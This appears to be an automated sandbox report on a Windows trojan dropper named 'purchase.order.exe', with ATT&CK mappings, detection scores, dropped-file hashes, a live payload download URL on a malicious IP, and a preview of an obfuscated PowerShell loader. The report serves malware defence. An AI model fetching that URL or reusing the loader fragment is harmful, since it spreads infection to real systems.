      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts411
      Process Injection      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Shared Modules      		Logon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin Hook411
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture11
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information      		Cached Domain Credentials114
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Software Packing      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      purchase.order.exe18%ReversingLabs
      purchase.order.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Fathoming.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\Fathoming.exe18%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin)0%Avira URL Cloudsafe
      http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin100%Avira URL Cloudmalware
      http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.binfalse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://crl.micropowershell.exe, 00000002.00000002.2642154478.0000000006D30000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2635924027.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin)Fathoming.exe, 00000008.00000003.2948566344.0000000006074000.00000004.00000020.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000002.2990340347.0000000006074000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.microsoft.copowershell.exe, 00000002.00000002.2659979907.0000000007FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.ftp.ftp://ftp.gopher.Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://nsis.sf.net/NSIS_ErrorErrorpurchase.order.exe, 00000000.00000000.1421338279.000000000040A000.00000008.00000001.01000000.00000003.sdmp, purchase.order.exe, 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Fathoming.exe, 00000008.00000000.2633837075.000000000040A000.00000008.00000001.01000000.00000007.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2635924027.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        212.162.149.66
                                        		unknownNetherlands
                                        		64236UNREAL-SERVERSUSfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1572377
                                        Start date and time:2024-12-10 14:06:24 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 47s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:10
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:purchase.order.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@6/13@0/1
                                        EGA Information:
                                        • Successful, ratio: 66.7%
                                        HCA Information:
                                        • Successful, ratio: 94%
                                        • Number of executed functions: 80
                                        • Number of non-executed functions: 298
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Stop behavior analysis, all processes terminated

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 7584 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: purchase.order.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        08:07:37API Interceptor36x Sleep call for process: powershell.exe modified
                                        08:10:10API Interceptor3x Sleep call for process: Fathoming.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        212.162.149.66Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 212.162.149.66/KtFSlX90.bin
                                        purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 212.162.149.66/NmxYyszZoKwuD57.bin

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        UNREAL-SERVERSUSForhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 212.162.149.66
                                        order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 212.162.149.89
                                        PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 212.162.149.89
                                        la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 162.251.123.175
                                        file.exeGet hashmaliciousRedLineBrowse
                                        • 212.162.149.48
                                        https://haqzt.trc20.kcgrocks.com/merchantServicesGet hashmaliciousUnknownBrowse
                                        • 172.96.10.214
                                        scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 162.251.122.87
                                        1g4lfpPUqt.exeGet hashmaliciousGuLoaderBrowse
                                        • 212.162.149.63
                                        purchase order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 212.162.149.66
                                        Juleferien.exeGet hashmaliciousFormBookBrowse
                                        • 212.162.149.128

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):53158
                                        Entropy (8bit):5.062687652912555
                                        Encrypted:false
                                        SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                        MD5:5D430F1344CE89737902AEC47C61C930
                                        SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                        SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                        SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                        C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (4399), with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):74268
                                        Entropy (8bit):5.138743165931201
                                        Encrypted:false
                                        SSDEEP:1536:8WcWpxebXy7DSehWrnBS4nC6jf6Lk6a71gMTGV795NvkC:8WzxCXN7BS4nBfwpa71fyVZ5x7
                                        MD5:CC4ED67CA05BD1F1D1A8C381E9356E3B
                                        SHA1:1D7B6BBCA940F66793B6F17F0C51B81DB03F05C0
                                        SHA-256:16529792E18438E8367854B1802F2E0F48AE4A063C3EF4843367BF4378657CCC
                                        SHA-512:9641C40595877464E051D73C075FA0D2CDAEFC10C217B54819483D5618E95EA8E04F9827EF48009C6231DD28DD4626BB2CEFD3B06F8AF3BF0FDBABE15F4FCB83
                                        Malicious:true
                                        Reputation:low
                                        Preview:$unascetic=$Overinflated;........$Disnaturalise = @'.Isentro.Mammalo$ Epip.eK ViljekaHar ucafDenatiofR energeIntrodusHundsedtSalamiee Fldes lSortme lSpongideOctopetnManienie Misrgt=Tasimet$ StinksS HardenaIntergon Fort lgInsularlAlmahshiFelthereActinosrFlammep; londes. Cha cofMaa eglutr,ogtynLnniveacForlorntNyttedeiDyndsmeoMonksgenrdviole Omkrse,PReconciiOnsdager Br ndvuLingonbsKontorl Fabriks(Analogi$ProgramUVejtolddDisindipFle eetaIntrigancanv sst H llabn ulysii Hind indeplaceg TipvogsIdeomotr Sinfo ePolysultSubdemotEpicraneJon.sernGalmandlSkyldbeyOttaveraOophoren Chlo itStatsglsBryllupsGlemseltSpyholei ElicitfStormdetSiplingerhibiarnUnderov, signal$RekonfiGObjectir Scalloi Preexpm nonintmKonkurriCrech.ssP,ysoneh F.reaa)Autocol Byplanl{Novembe.Lumrend.G andif$ verboFNonesseiFllestrrCal arelstilfrdiDetal.enFedtdepgTylvtereBartho fRegimendForplejsStykk re,ndragelNonpsyceVningennSvendels moo,ma Dionaea(TurkisoTMariolaaAntilibk ometinoForvntbmP ivataeHv.rlaetRegardfeBnligetrBootikisf

                                        C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil\tallness.ber

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):493903
                                        Entropy (8bit):1.2514017425028907
                                        Encrypted:false
                                        SSDEEP:1536:J5fAgVg2t2pObnNoCYrlANC4fcmCuJyzbffMxL+hJfryobV3Krqx1TJG:r/Bb+CYr2cbPiihhqUO
                                        MD5:8B4C2BBEDD252D6BB6DB679AB3723802
                                        SHA1:2D9775744675D3B32F3CA2FDF975C9293B719926
                                        SHA-256:9CCADD82A127BA29D7BA291CB307753D060CA26A3C3CCBCB9EDB3F3A38E5EE31
                                        SHA-512:7940E4CE5AB08DDFE4DB8B2676F9B92C51DC794C8772760C279B8BC57B7C97502ADBF91747D4FA57BAA6B5B695504E090875DF6890D478B8FD6CF8D70B3C8F65
                                        Malicious:false
                                        Reputation:low
                                        Preview:..Zy..........................................V......................k...................g........./.............Q.........l..#.....^............................................x..........&.............................../................................................................./............/.........................).......?......................p.............o..........................................sy............................................................5.........................R2...................................................................................................."e..............................................Y..................................................l.......{................s...............................................9..........................d.........&.......r......................<..........................................................................................................?............*..................L.................

                                        C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Tilsmil\vaklende.sna

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):340924
                                        Entropy (8bit):1.2553271369192232
                                        Encrypted:false
                                        SSDEEP:768:rmUSNMYYmaSwBaGhKmULRAGcnjPDQ5lHJ30U5MFvsAkhuD7odAmLVBeOdlfHV22E:vvCsDuqEZ11vtew5dzv9
                                        MD5:C41E860BAAE2CC8168C2ABD50BB5BDF4
                                        SHA1:548575B164EDA9485A2B3F66161C8024619B6423
                                        SHA-256:601CF3825DCDD9076ED0A3CB778F62AF942CF20D64D3F86335A57B43E29F2B52
                                        SHA-512:9D2D97A7CAE52202807093ABF8BF4DE3F01BF54BAFF02C8110D800A7E6B1F6290B3ED60FB954809F9231BEDF730CA7244E9E51EE6B6074445DB180EB0E956718
                                        Malicious:false
                                        Reputation:low
                                        Preview:......................j..h....!..............................................p.............c....P............................k......................................y...............o`....................}...'9...........................Gt......................P.............................................................'.................................#.......................!.............................................................................................W.....C..........................................................................U...g......................................H.....s............n........U........)..........................................s.........S.................t......................................M.................................................................................S.............................................................H........................).............c.$...... .....................n.....................................

                                        C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\acology.mar

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):437071
                                        Entropy (8bit):1.253825384833456
                                        Encrypted:false
                                        SSDEEP:768:uWsvcxI4BCLNVp0kyRWlxp4pkE5sS+ZA4o7VengmxKgoMqbGam2C1afEUe/u41Az:2T4BC0SG4J+VB8GA2pzEszrq2GrwLnj
                                        MD5:F030199A57CDBFC5D06AC8BFB59059C3
                                        SHA1:3C7AA5EA48CBAA34C8426B76498CD4BF5BF644BF
                                        SHA-256:FD1253B138D560D3AD0A56C32F37D0FDBDE9E16CC37E59E991595C7349B1F087
                                        SHA-512:7EC5E2553A15923396B77E07685172CEEAFDE8F60CCBB97E0796DCB8E1BBA8FF17F1CA242B143AD497942FDC8D7473AEFB5091E6492616B3D8C0EBCBA13C98C2
                                        Malicious:false
                                        Preview:.....................................X....................................>..a......................A......w..............................@.y........K..............................................z...................z...........p............V.....................................................h....................|..U.........../................................................................O..+.............................................+................F....................................2......................J..........................".........................A.............................-..............G..............S...............V.............t.......=.....................b.............................................................................................................................................................w................3........f.................2.........................m.0.........................................q...............................

                                        C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\straffesager.tra

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):484281
                                        Entropy (8bit):1.2585657408825282
                                        Encrypted:false
                                        SSDEEP:1536:ZtZbLcPMi2av+CVKljwe/ieUZ39FbMXVvL:PyPrdCBlotFbO
                                        MD5:A8740E0A6C72618AB3FB8804F4835BEF
                                        SHA1:6393CB3D9E3E670BA5C96F4A757F5B198196EB15
                                        SHA-256:EF5DB6A0097473B03CCF2A1E6152E2AC7AC57BB31B31A06529BCD3900E9C097C
                                        SHA-512:55740B7FE5A3D26FC47F9695B2FD33C045E67E6E36F0D2121235C2AEA9800F19740C1B0F797E32E8108E10245D8A4616308173E24A61129D82B9D60500C8763C
                                        Malicious:false
                                        Preview:.............................................................................[....2...........W......A.................S........y.................................................................4.......D...=...............Y......................".............................................................7............................................................................Y.....................................{........{.....>................m.....................................`...................................r...............................?.....#...............8.?.....................................................-..........\....................................................%:.................................p.................{.......r.............u..m...b...........................<.........................................................................1...............................................S.............................................4.............W....

                                        C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Loadless.Pin

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase.order.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):336637
                                        Entropy (8bit):7.5896119516662095
                                        Encrypted:false
                                        SSDEEP:6144:DTeuTRHWWOGm79imNXScadM9DhDc1o26M+iYAj0wTEzOMi7z337CXFV55OVoY:DSuTRHWWOGm79imNXbadM9DhDQoHBwg0
                                        MD5:ABAAC81329EECF81FF3C657032374407
                                        SHA1:F1A1A80646B32A2B13609055CF2A4C70A2AC39A1
                                        SHA-256:6CFCEDF277B5B94AED858D15D4D47155F586CFAA5C8237019ED4A2E41A7801A8
                                        SHA-512:B92D75DF310393DE3B346B24B7FFE5B825FBA32B78F03C10D1811BC67E6DCE4AF4E06C15BFDF02C4E810195549EAAEF2D1F5CF6A272C7199C7E67ACA1102055A
                                        Malicious:false
                                        Preview:.[[....NNN..................A...G.....ee...^......0.....................ZZ............++....`.......................................VVVVVVV.....88......................<<.#.. ...8....qq.aaa..RRRRR.........FF.^.....'...........ii....d....................................5.\..........7.J. .................FFFFFF.....O..............:.N.#..g.........................-....................................DD.........................yy...o..........;;..AAAAA......^.......zzz..................................#....,................nn...............5......JJ..................................7..`...../..22.......M...&&&..............-..I............II....._.......`.QQQQ...........*.....nn................~~~..........eee..........................p...........E.............-..............................P......3......!............777....P............RR.....................d...............L...........4.....M.................................v.....XX....i..<<.(..........................................4

                                        C:\Users\user\AppData\Local\Temp\Fathoming.exe

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):801068
                                        Entropy (8bit):7.827752052976843
                                        Encrypted:false
                                        SSDEEP:12288:UXqlVfD6qC0llhpgdtaQmxjBrmu+U1tczmuV4PRklT3we+doWVkeehow:UXqzrTcq9xmu+TzmW4QT31V1how
                                        MD5:8125E510DF447B0EAD0E263D006A253E
                                        SHA1:D1C5A46902E50A785D7BE8822B5E80E262CF640D
                                        SHA-256:91E694F4AD9556406DB3D63BE6B1917EDBD509118A83A9D920FC758F0B8D0A54
                                        SHA-512:9CB68F4C15BE93641D90CADA462FB4626941274462A577E76049A09F7CEE797767287B973F1A63A7BE89878A9E9C4B98975A32EEDEDA620BAAF681621ABD9B4A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 18%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@.......................................@..........................................................................................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\Fathoming.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pzlbwxk.fji.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1vjw1yl.em0.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4vpsp50.0r4.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcolr4om.urg.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.827752052976843
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:purchase.order.exe
                                        File size:801'068 bytes
                                        MD5:8125e510df447b0ead0e263d006a253e
                                        SHA1:d1c5a46902e50a785d7be8822b5e80e262cf640d
                                        SHA256:91e694f4ad9556406db3d63be6b1917edbd509118a83a9d920fc758f0b8d0a54
                                        SHA512:9cb68f4c15be93641d90cada462fb4626941274462a577e76049a09f7cee797767287b973f1a63a7be89878a9e9c4b98975a32eededa620baaf681621abd9b4a
                                        SSDEEP:12288:UXqlVfD6qC0llhpgdtaQmxjBrmu+U1tczmuV4PRklT3we+doWVkeehow:UXqzrTcq9xmu+TzmW4QT31V1how
                                        TLSH:0F05029179A0163FC16D413B71672E71EBAB9FA813776402A223FF4B71357627E08682
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....

                                        File Icon

                                        Icon Hash:71868ed4e8b04d49

                                        Static PE Info

                                        General

                                        Entrypoint:0x40351c
                                        Entrypoint Section:.text
